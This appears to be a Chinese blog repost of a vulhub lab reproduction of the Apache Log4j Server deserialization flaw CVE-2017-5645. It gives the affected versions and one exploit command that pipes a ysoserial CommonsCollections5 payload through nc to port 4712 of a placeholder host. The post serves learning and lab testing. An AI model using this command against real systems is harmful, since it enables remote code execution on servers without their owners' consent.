1. 首页
  2. 文章中心
  3. vulhub漏洞复现

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

65 阅读 0 评论
我是靠谱客的博主 傲娇小土豆,这篇文章主要介绍Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645),现在分享给大家,希望可以做个参考。

影响范围

Apache Log4j 2.8.2之前的2.x版本

漏洞复现

使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可

java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

返回容器查看
在这里插入图片描述

最后

以上就是傲娇小土豆最近收集整理的关于Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)的全部内容,更多相关Apache内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(43)

相关文章

Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击
Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击
Apache Log4j 漏洞修复Log4j 漏洞修复1、漏洞介绍2、漏洞修复
Apache Log4j 漏洞修复Log4j 漏洞修复1、漏洞介绍2、漏洞修复
Log4j2的使用demo
Log4j2的使用demo
December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services(Doc ID 2827611.1)PURPOSESCOPEDETAILS
December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services(Doc ID 2827611.1)PURPOSESCOPEDETAILS
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
漏洞复现 | SaltStack认证绕过(CVE‐2020‐11651)
漏洞复现 | SaltStack认证绕过(CVE‐2020‐11651)
框架漏洞学习日记——第三天(CVE-2017-5645)
框架漏洞学习日记——第三天(CVE-2017-5645)
Flex 序列和反序列化ArrayCollection
Flex 序列和反序列化ArrayCollection

评论列表共有 0 条评论

立即
投稿
返回
顶部